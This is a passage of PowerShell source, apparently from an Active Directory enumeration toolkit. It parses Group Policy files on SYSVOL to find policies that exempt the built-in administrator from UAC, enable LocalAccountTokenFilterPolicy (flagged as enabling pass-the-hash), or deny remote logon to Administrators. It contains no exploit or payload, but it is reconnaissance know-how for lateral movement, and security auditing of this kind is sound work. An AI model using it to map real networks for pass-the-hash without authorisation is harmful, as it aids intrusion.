Values"]["MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken"] 340 | if ($FilterAdministratorToken -and ($FilterAdministratorToken[0] -eq 4) -and ($FilterAdministratorToken[1] -eq 0)) 341 | { 342 | Write-Verbose "The following GPO exempts the RID 500 account from UAC protection by disabling FilterAdministratorToken: $GPOdisplayName - $GPOname" 343 | # append to FilterAdministratorToken GPO list if it is not already there 344 | if ($RemoteAccessPolicies.FilterAdministratorToken -notcontains $GPOname) { $RemoteAccessPolicies.FilterAdministratorToken += $GPOname } 345 | } 346 | } 347 | 348 | # LocalAccountTokenFilterPolicy check via Registry.xml 349 | # clear $ParseArgs for next use. 350 | $ParseArgs.Clear() 351 | # parse Registry.xml file (if it exists) for LocalAccountTokenFilterPolicy 352 | $ParseArgs = @{ 'RegistryXMLpath' = "$GPOPath\MACHINE\Preferences\Registry\Registry.xml" } 353 | if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } 354 | Get-RegistryXML @ParseArgs | ForEach-Object { 355 | if ($_.property -eq "LocalAccountTokenFilterPolicy" -and ($_.value -eq "00000001")) 356 | { 357 | Write-Verbose "The following GPO enables pass-the-hash by enabling LocalAccountTokenFilterPolicy: $GPOdisplayName - $GPOname" 358 | # append to EnableLUA GPO list if it is not already there 359 | if ($RemoteAccessPolicies.LocalAccountTokenFilterPolicy -notcontains $GPOname) { $RemoteAccessPolicies.LocalAccountTokenFilterPolicy += $GPOname } 360 | } 361 | } 362 | 363 | # SeDenyNetworkLogonRight and SeDenyRemoteInteractiveLogonRight check via GptTmpl.inf 364 | # Use existing object that parsed the file 365 | if($Inf -and ($Inf.psbase.Keys -contains "Privilege Rights")) 366 | { 367 | $SeDenyNetworkLogonRight = $Inf["Privilege Rights"]["SeDenyNetworkLogonRight"] 368 | if ($SeDenyNetworkLogonRight -and ($SeDenyNetworkLogonRight -contains "*S-1-5-32-544")) 369 | { 370 | Write-Verbose "The following GPO includes the built-in Administrators group within the SeDenyNetworkLogonRight: $GPOdisplayName - $GPOname" 371 | # append to SeDenyNetworkLogonRight GPO list if it is not already there 372 | if ($RemoteAccessPolicies.SeDenyNetworkLogonRight -notcontains $GPOname) { $RemoteAccessPolicies.SeDenyNetworkLogonRight += $GPOname } 373 | } 374 | 375 | $SeDenyRemoteInteractiveLogonRight = $Inf["Privilege Rights"]["SeDenyRemoteInteractiveLogonRight"] 376 | if ($SeDenyRemoteInteractiveLogonRight -and ($SeDenyRemoteInteractiveLogonRight -contains "*S-1-5-32-544")) 377 | { 378 | Write-Verbose "The following GPO includes the built-in Administrators group within the SeDenyRemoteInteractiveLogonRight: $GPOdisplayName - $GPOname" 379 | # append to SeDenyRemoteInteractiveLogonRight GPO list if it is not already there 380 | if ($RemoteAccessPolicies.SeDenyRemoteInteractiveLogonRight -notcontains $GPOname) { $RemoteAccessPolicies.SeDenyRemoteInteractiveLogonRight += $GPOname } 381 | } 382 | } 383 | } 384 | } 385 | 386 | END { 387 | # return hash table containing lists of GPOs for each remote access policy 388 | return $RemoteAccessPolicies 389 | } 390 | } 391 | 392 | function Get-RegistryXML { 393 | <# 394 | .SYNOPSIS 395 | 396 | Helper to parse a Registry.xml file path into an array of custom objects. 397 | 398 | .PARAMETER RegistryXMLpath 399 | 400 | The Registry.xml file path name to parse. 401 | 402 | .PARAMETER Credential 403 | 404 | A [Management.Automation.PSCredential] object of alternate credentials 405 | for connection to the remote system. 406 | 407 | #> 408 | 409 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 410 | [CmdletBinding()] 411 | Param ( 412 | [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 413 | [Alias('Path')] 414 | [String] 415 | $RegistryXMLPath, 416 | 417 | [Management.Automation.PSCredential] 418 | [Management.Automation.CredentialAttribute()] 419 | $Credential = [Management.Automation.PSCredential]::Empty 420 | ) 421 | 422 | BEGIN { 423 | $MappedPaths = @{} 424 | } 425 | 426 | PROCESS { 427 | try { 428 | 429 | if (($RegistryXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { 430 | $SysVolPath = "\\$((New-Object System.Uri($RegistryXMLPath)).Host)\SYSVOL" 431 | if (-not $MappedPaths[$SysVolPath]) { 432 | # map IPC$ to this computer if it's not already 433 | Add-RemoteConnection -Path $SysVolPath -Credential $Credential 434 | $MappedPaths[$SysVolPath] = $True 435 | } 436 | } 437 | 438 | [XML]$RegistryXMLcontent = Get-Content $RegistryXMLPath -ErrorAction Stop 439 | 440 | $registryKeyArray = New-Object System.Collections.Generic.List[System.Object] 441 | 442 | # process all registry properties in the XML 443 | $RegistryXMLcontent | Select-Xml "/RegistrySettings/Registry" | Select-Object -ExpandProperty node | ForEach-Object { 444 | 445 | $GPORegistry = New-Object PSObject 446 | $GPORegistry | Add-Member Noteproperty "hive" $_.Properties.hive 447 | $GPORegistry | Add-Member Noteproperty "key" $_.Properties.key 448 | $GPORegistry | Add-Member Noteproperty "property" $_.Properties.name 449 | $GPORegistry | Add-Member Noteproperty "type" $_.Properties.type 450 | $GPORegistry | Add-Member Noteproperty "value" $_.Properties.value 451 | 452 | $registryKeyArray.Add($GPORegistry) 453 | 454 | } 455 | } 456 | catch { 457 | Write-Verbose "[Get-RegistryXML] Error parsing $TargetRegistryXMLPath : $_" 458 | } 459 | } 460 | 461 | END { 462 | # remove the SYSVOL mappings 463 | $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ } 464 | # return array of regsitry settings 465 | return $registryKeyArray 466 | } 467 | } 468 | --------------------------------------------------------------------------------